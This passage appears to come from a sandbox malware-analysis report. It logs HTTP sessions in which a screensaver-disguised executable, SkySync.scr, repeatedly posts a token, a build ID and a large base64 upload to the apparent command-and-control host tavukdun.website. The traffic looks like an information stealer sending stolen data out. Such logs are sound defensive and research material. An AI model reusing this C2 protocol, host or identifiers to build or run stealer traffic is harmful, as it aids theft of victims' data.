31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------BGHJJDGHCBGDHIECBGIDCont
2024-11-01 19:58:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:35 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.11.20	58992	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:36 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:36 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------JDBGDHIIDAEBFHJJDBFICont
2024-11-01 19:58:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.11.20	58993	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:37 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBKKKJJJKKEBGDAFID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:37 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------CFCBKKKJJJKKEBGDAFIDCont
2024-11-01 19:58:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.11.20	58994	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:38 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:38 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------BAKFBKEHDBGHJJKFIEGDCont
2024-11-01 19:58:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:39 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.11.20	58995	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:40 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFBKFHCAEHJJKEGDGH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 161705 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:40 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 42 4b 46 48 43 41 45 48 4a 4a 4b 45 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 42 4b 46 48 43 41 45 48 4a 4a 4b 45 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 42 4b 46 48 43 41 45 48 4a 4a 4b 45 47 44 47 48 0d 0a 43 6f 6e 74 Data Ascii: ------IECFBKFHCAEHJJKEGDGHContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------IECFBKFHCAEHJJKEGDGHContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------IECFBKFHCAEHJJKEGDGHCont
2024-11-01 19:58:40 UTC	16355	OUT	Data Raw: 58 39 61 55 2f 79 37 5a 35 2b 74 4a 31 49 37 34 39 66 38 61 41 44 73 66 77 7a 51 4f 76 76 2f 58 36 30 63 35 48 65 67 6a 39 4b 42 69 45 63 41 39 6a 2b 65 61 54 50 34 66 35 34 70 78 79 51 4f 4f 65 66 70 53 64 76 63 65 6e 4e 41 43 64 4d 44 6f 52 36 63 30 59 2f 58 76 31 6f 50 54 30 7a 32 6f 48 48 75 66 65 67 42 44 77 66 70 2f 6e 69 67 6a 6b 64 69 65 4b 4f 33 76 36 6d 67 2f 79 34 7a 51 4d 44 7a 37 39 4f 6c 42 7a 6a 31 39 36 54 47 53 4f 35 39 4b 43 4d 67 6e 2f 39 56 41 42 32 36 35 2f 78 39 4b 51 6e 72 33 7a 32 70 33 66 76 2b 48 57 6b 36 44 2f 4f 50 7a 6f 47 49 65 54 36 35 36 44 74 69 6a 72 39 50 57 6c 39 4d 2f 6b 4f 75 4b 54 42 78 36 43 67 41 48 47 66 36 64 4b 51 39 66 65 6c 49 36 2b 31 48 55 65 33 50 57 67 59 5a 77 65 50 31 36 35 70 76 62 32 70 65 68 39 44 37 Data Ascii: X9aU/y7Z5+tJ1I749f8aADsfwzQOvv/X60c5Hegj9KBiEcA9j+eaTP4f54pxyQOOefpSdvcenNACdMDoR6c0Y/Xv1oPT0z2oHHufegBDwfp/nigjkdieKO3v6mg/y4zQMDz79OlBzj196TGSO59KCMgn/9VAB265/x9KQnr3z2p3fv+HWk6D/OPzoGIeT656Dtijr9PWl9M/kOuKTBx6CgAHGf6dKQ9felI6+1HUe3PWgYZweP165pvb2peh9D7
2024-11-01 19:58:40 UTC	16355	OUT	Data Raw: 42 2f 57 6b 41 4f 65 2b 50 57 6c 37 66 30 50 53 6a 30 39 50 62 70 51 4d 44 6a 50 75 65 35 70 4f 69 2b 33 74 31 6f 37 2b 76 38 41 6a 52 6e 4a 39 63 2b 6c 41 78 41 65 66 66 6d 67 64 50 70 2f 4b 67 6e 32 35 48 70 30 70 53 50 66 6a 6a 70 30 2b 6c 4d 42 70 4f 52 37 65 6e 53 67 38 6e 6b 6e 38 61 55 6a 74 6a 6e 39 4b 51 6a 67 39 71 42 67 65 50 72 30 34 36 55 48 38 73 64 68 2b 74 4b 65 50 59 2f 70 6a 36 55 68 35 39 43 66 31 6f 41 54 48 4a 39 44 33 4e 4a 32 2f 70 6e 74 53 34 77 44 2f 49 30 70 36 44 74 6e 42 70 41 4e 77 63 63 64 54 32 39 36 44 32 37 66 53 6a 48 4a 36 6b 55 48 37 76 74 36 44 2b 5a 6f 47 48 66 50 48 70 37 55 70 7a 78 2b 46 49 65 41 66 53 6a 76 6a 6f 50 62 6b 2f 68 51 41 45 39 76 54 30 39 66 61 67 44 36 35 35 50 2f 41 4e 65 67 5a 41 39 42 51 4f 50 62 Data Ascii: B/WkAOe+PWl7f0PSj09PbpQMDjPue5pOi+3t1o7+v8AjRnJ9c+lAxAeffmgdPp/Kgn25Hp0pSPfjjp0+lMBpOR7enSg8nkn8aUjtjn9KQjg9qBgePr046UH8sdh+tKePY/pj6Uh59Cf1oATHJ9D3NJ2/pntS4wD/I0p6DtnBpANwccdT296D27fSjHJ6kUH7vt6D+ZoGHfPHp7Upzx+FIeAfSjvjoPbk/hQAE9vT09fagD655P/ANegZA9BQOPb
2024-11-01 19:58:40 UTC	16355	OUT	Data Raw: 53 30 68 6f 41 4b 4b 4b 4b 59 43 55 55 74 4a 51 4d 51 30 55 47 6c 70 67 4a 53 30 6e 70 51 61 41 43 67 30 55 55 68 69 55 55 74 48 61 6d 4d 53 6b 70 61 54 74 51 41 55 47 69 69 6d 41 55 55 55 74 41 43 55 55 74 4a 51 41 48 76 53 55 76 4e 4a 54 51 77 6f 6f 6f 6f 41 4b 51 30 74 46 41 43 55 6c 4b 61 4d 55 77 45 6f 6f 6f 6f 47 46 46 46 46 4d 41 6f 70 61 4b 51 78 74 46 4c 52 54 41 53 69 69 6c 6f 41 53 6b 70 61 4b 41 45 6f 70 61 53 6d 4d 4b 51 69 6e 55 55 77 47 34 6f 70 61 51 30 44 44 74 51 66 79 70 61 4f 31 4f 34 43 5a 70 77 64 67 4f 44 54 54 30 6f 49 70 32 51 44 69 79 74 39 35 42 39 52 54 54 43 68 2b 36 2b 50 5a 71 53 6c 37 66 6a 53 35 51 32 49 7a 62 79 4b 4f 6d 34 65 6f 35 71 4d 6a 42 2f 6f 61 73 41 6b 64 44 2b 56 4f 38 7a 49 2b 59 41 6a 33 70 57 61 4b 55 32 69 Data Ascii: S0hoAKKKKYCUUtJQMQ0UGlpgJS0npQaACg0UUhiUUtHamMSkpaTtQAUGiimAUUUtACUUtJQAHvSUvNJTQwooooAKQ0tFACUlKaMUwEooooGFFFFMAopaKQxtFLRTASiiloASkpaKAEopaSmMKQinUUwG4opaQ0DDtQfypaO1O4CZpwdgODTT0oIp2QDiyt95B9RTTCh+6+PZqSl7fjS5Q2IzbyKOm4eo5qMjB/oasAkdD+VO8zI+YAj3pWaKU2i
2024-11-01 19:58:40 UTC	16355	OUT	Data Raw: 36 30 76 53 6b 41 59 78 2f 39 65 6b 36 66 34 6d 6a 2b 66 70 51 4f 76 76 36 55 58 51 57 46 36 43 67 39 50 62 31 70 36 52 53 73 42 69 4a 69 50 54 62 55 71 32 4e 77 32 50 6b 41 7a 2f 65 4e 53 35 78 58 55 4e 53 76 33 7a 53 34 36 64 76 35 31 63 47 6e 53 5a 2b 61 52 42 37 44 6d 6e 72 70 38 59 50 4d 35 2f 34 43 74 51 36 73 51 73 55 42 31 48 72 53 38 5a 72 54 57 7a 74 51 4f 56 64 2f 71 61 6c 57 4f 33 51 66 4c 62 6f 66 63 38 31 4c 72 4c 6f 68 57 5a 6a 6a 72 36 6b 2b 6e 4e 53 4c 62 7a 4f 66 6b 68 6b 59 2f 37 74 62 49 6c 32 41 68 46 52 42 37 4b 4b 58 7a 35 47 49 2b 63 2f 30 71 48 57 6c 30 51 57 5a 6d 4a 70 64 36 2f 2f 41 43 78 4b 6a 31 5a 71 73 4a 6f 6b 78 78 35 6b 38 4b 2f 55 35 71 77 58 63 6a 35 6d 59 2f 6a 54 52 2f 6e 4e 52 37 53 6f 2b 6f 57 66 63 61 75 6a 32 71 Data Ascii: 60vSkAYx/9ek6f4mj+fpQOvv6UXQWF6Cg9Pb1p6RSsBiJiPTbUq2Nw2PkAz/eNS5xXUNSv3zS46dv51cGnSZ+aRB7Dmnrp8YPM5/4CtQ6sQsUB1HrS8ZrTWztQOVd/qalWO3QfLbofc81LrLohWZjjr6k+nNSLbzOfkhkY/7tbIl2AhFRB7KKXz5GI+c/0qHWl0QWZmJpd6//ACxKj1ZqsJokxx5k8K/U5qwXcj5mY/jTR/nNR7So+oWfcauj2q
2024-11-01 19:58:40 UTC	16355	OUT	Data Raw: 6f 6f 41 4f 61 4b 4b 4b 59 42 52 52 7a 52 53 41 4b 4b 4b 4b 59 42 52 52 52 51 4d 44 53 55 55 55 41 46 46 46 46 41 43 55 59 70 61 4b 42 69 55 55 74 46 41 43 55 55 55 55 41 4a 52 53 39 71 53 67 41 70 44 53 30 55 44 45 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 59 6c 46 4c 78 53 55 77 43 69 69 69 67 59 6c 46 48 61 69 6b 41 55 68 36 30 74 42 36 30 44 45 6f 6f 6f 70 6f 42 44 52 51 61 4b 41 43 6b 70 61 4b 42 69 55 55 55 55 77 45 6f 6f 50 57 69 67 41 70 4b 57 69 67 42 4b 4b 4b 4b 59 77 6f 6f 6f 70 41 4a 52 51 61 4b 59 78 4b 4b 57 6b 70 67 46 46 46 46 41 42 53 55 74 4a 51 4d 4b 4b 4b 4b 59 41 61 53 6c 35 70 4b 42 68 53 55 74 4a 51 41 55 55 55 55 41 46 46 46 4a 51 41 74 46 4a 52 54 51 77 6f 6f 6f 37 55 41 4a 52 53 30 6c 41 77 6f 6f 6f 6f 41 44 53 55 55 55 44 43 Data Ascii: ooAOaKKKYBRRzRSAKKKKYBRRRQMDSUUUAFFFFACUYpaKBiUUtFACUUUUAJRS9qSgApDS0UDEooooAKKKKACiiigYlFLxSUwCiiigYlFHaikAUh60tB60DEooopoBDRQaKACkpaKBiUUUUwEooPWigApKWigBKKKKYwooopAJRQaKYxKKWkpgFFFFABSUtJQMKKKKYAaSl5pKBhSUtJQAUUUUAFFFJQAtFJRTQwooo7UAJRS0lAwooooADSUUUDC
2024-11-01 19:58:40 UTC	16355	OUT	Data Raw: 71 43 4d 67 6e 2f 39 56 41 77 50 54 31 2f 6e 6e 30 70 70 50 58 75 54 32 70 63 38 39 54 2b 48 57 6a 39 50 58 30 2f 4f 67 59 6e 55 2b 76 74 32 78 52 31 36 39 50 57 6c 39 50 35 44 72 69 6a 48 48 58 41 70 41 4a 30 7a 2f 54 70 51 65 70 37 6e 2f 50 4e 42 48 58 32 6f 37 44 30 35 6f 47 42 50 55 5a 78 39 65 75 61 54 70 39 4b 58 6f 65 75 44 37 63 30 6e 55 44 2b 56 41 43 6b 59 35 36 2f 34 55 6e 55 48 73 66 65 67 67 35 50 66 76 6b 55 65 6e 61 67 59 67 36 66 54 6a 72 53 39 2b 70 77 50 53 6d 39 42 37 6a 6a 69 6a 50 50 72 37 30 41 48 54 32 2b 74 48 75 4f 53 4f 31 42 37 35 35 6f 4a 79 66 55 39 4f 6c 41 41 50 70 7a 36 6d 6a 72 36 67 44 2b 56 47 63 6e 33 2f 4f 67 2b 76 54 74 78 51 41 44 72 2f 68 53 44 6b 59 37 30 6f 47 44 39 65 2f 74 39 4b 54 74 36 6a 38 71 42 68 33 36 59 Data Ascii: qCMgn/9VAwPT1/nn0ppPXuT2pc89T+HWj9PX0/OgYnU+vt2xR169PWl9P5DrijHHXApAJ0z/TpQep7n/PNBHX2o7D05oGBPUZx9euaTp9KXoeuD7c0nUD+VACkY56/4UnUHsfegg5PfvkUenagYg6fTjrS9+pwPSm9B7jjijPPr70AHT2+tHuOSO1B755oJyfU9OlAAPpz6mjr6gD+VGcn3/Og+vTtxQADr/hSDkY70oGD9e/t9KTt6j8qBh36Y
2024-11-01 19:58:40 UTC	16355	OUT	Data Raw: 4e 4d 42 61 51 30 5a 6f 4e 41 77 6f 6f 7a 53 55 42 59 4b 4b 53 6a 6d 6b 4d 4b 44 53 55 6c 4d 59 75 61 54 4e 46 46 41 42 53 55 55 55 44 45 4e 46 46 46 4d 59 55 55 43 6a 46 41 42 53 63 55 55 68 6f 41 57 69 6b 6f 6f 47 4c 53 55 55 55 68 69 55 55 55 55 77 51 55 55 55 55 41 4a 52 52 51 61 51 77 4e 4a 53 6d 6b 6f 41 51 55 64 71 57 69 67 59 6c 42 6f 6f 4e 41 43 55 74 4a 53 30 44 45 70 4f 31 4f 78 2b 64 4e 70 67 46 48 61 67 39 36 4b 42 68 2f 6e 6d 6a 46 47 65 66 36 30 43 6b 41 43 67 6a 6b 65 74 46 42 2f 7a 6d 67 41 46 42 48 50 6f 66 58 74 52 2b 74 48 55 2f 77 43 46 41 78 56 64 30 2b 36 37 4b 66 59 6b 56 4b 74 35 63 72 2f 79 31 62 38 63 47 6f 54 54 54 2b 5a 70 32 51 46 78 64 53 6e 42 35 56 47 48 75 4b 6b 47 70 4b 66 76 57 34 35 37 71 33 39 4d 56 6e 2f 7a 39 71 42 Data Ascii: NMBaQ0ZoNAwoozSUBYKKSjmkMKDSUlMYuaTNFFABSUUUDENFFFMYUUCjFABScUUhoAWikooGLSUUUhiUUUUwQUUUUAJRRQaQwNJSmkoAQUdqWigYlBooNACUtJS0DEpO1Ox+dNpgFHag96KBh/nmjFGef60CkACgjketFB/zmgAFBHPofXtR+tHU/wCFAxVd0+67KfYkVKt5cr/y1b8cGoTTT+Zp2QFxdSnB5VGHuKkGpKfvW457q39MVn/z9qB
2024-11-01 19:58:40 UTC	16355	OUT	Data Raw: 53 47 6c 6f 6f 47 4a 51 61 4b 44 51 4d 53 69 69 6b 6f 47 46 46 46 46 41 41 61 53 69 69 67 59 68 6f 6f 6f 6f 41 53 69 69 69 67 59 55 6c 46 48 65 6d 4d 44 53 55 74 4a 54 41 51 30 55 66 70 53 45 67 65 39 41 77 6f 70 43 33 70 53 45 6b 39 65 61 59 78 53 51 50 65 6b 4c 2f 41 4f 54 54 61 51 30 72 6c 57 46 4a 4a 70 4f 61 4b 53 6a 55 61 43 69 69 69 6b 4d 53 69 67 30 55 41 4a 53 47 6c 70 44 51 4d 4b 4b 4b 4b 42 69 55 6c 4c 53 55 44 45 6f 6f 6f 6f 47 49 61 4f 39 42 6f 6f 41 44 53 55 76 36 55 33 74 51 4d 4b 4b 4b 4b 42 69 55 6c 4c 53 66 72 51 4d 44 53 55 55 68 4f 54 51 4d 50 35 30 47 6a 2b 64 49 61 41 44 2f 41 41 70 4b 4b 4b 43 67 2f 53 67 30 6c 4b 65 6e 58 6a 33 6f 41 62 52 32 70 61 51 30 79 68 50 58 38 4b 42 31 39 36 58 6e 49 70 44 2b 67 39 36 51 43 48 70 6d 6a 39 Data Ascii: SGlooGJQaKDQMSiikoGFFFFAAaSiigYhooooASiiigYUlFHemMDSUtJTAQ0UfpSEge9AwopC3pSEk9eaYxSQPekL/AOTTaQ0rlWFJJpOaKSjUaCiiikMSig0UAJSGlpDQMKKKKBiUlLSUDEooooGIaO9BooADSUv6U3tQMKKKKBiUlLSfrQMDSUUhOTQMP50Gj+dIaAD/AApKKKCg/Sg0lKenXj3oAbR2paQ0yhPX8KB196XnIpD+g96QCHpmj9
2024-11-01 19:58:40 UTC	14510	OUT	Data Raw: 4d 44 53 55 55 55 44 43 6b 4e 48 65 6a 76 51 4d 53 6a 76 37 30 70 2f 4f 6d 30 78 68 51 66 79 6f 6f 4a 79 61 42 68 7a 53 64 71 4b 53 67 45 42 37 30 6e 2b 65 4b 55 2f 72 53 66 35 78 51 4d 4b 54 30 70 66 79 70 44 30 36 38 55 68 67 65 52 36 30 68 2f 4b 67 39 50 72 36 30 64 36 59 42 32 70 4f 39 48 62 32 39 61 42 2b 6e 46 41 78 4b 44 30 6f 50 62 76 51 54 2f 41 50 72 4e 41 78 44 2b 56 48 58 48 38 71 44 32 36 34 39 36 51 39 36 43 67 36 5a 2f 55 55 44 71 4f 34 6f 50 53 6a 39 4d 65 6c 41 49 42 7a 6a 6e 38 52 77 61 51 63 2b 33 72 53 6b 38 65 6f 50 72 53 44 50 31 6f 47 48 58 2f 77 43 76 53 64 41 4f 77 39 71 44 79 61 4d 2f 68 6e 4e 41 77 50 51 2b 2f 70 51 66 38 67 30 6e 62 32 39 75 74 42 39 75 66 72 51 41 45 38 2b 2f 36 55 48 6f 66 54 31 6f 49 36 39 7a 2b 74 49 65 66 Data Ascii: MDSUUUDCkNHejvQMSjv70p/Om0xhQfyooJyaBhzSdqKSgEB70n+eKU/rSf5xQMKT0pfypD068UhgeR60h/Kg9Pr60d6YB2pO9Hb29aB+nFAxKD0oPbvQT/APrNAxD+VHXH8qD26496Q96Cg6Z/UUDqO4oPSj9MelAIBzjn8RwaQc+3rSk8eoPrSDP1oGHX/wCvSdAOw9qDyaM/hnNAwPQ+/pQf8g0nb29utB9ufrQAE8+/6UHofT1oI69z+tIef
2024-11-01 19:58:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.11.20	58996	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:42 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:42 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 Data Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------AEBGHDBKEBGIDHJJEHCACont
2024-11-01 19:58:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.11.20	58997	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:43 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBAEGCGCGIEGDHIDHJJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
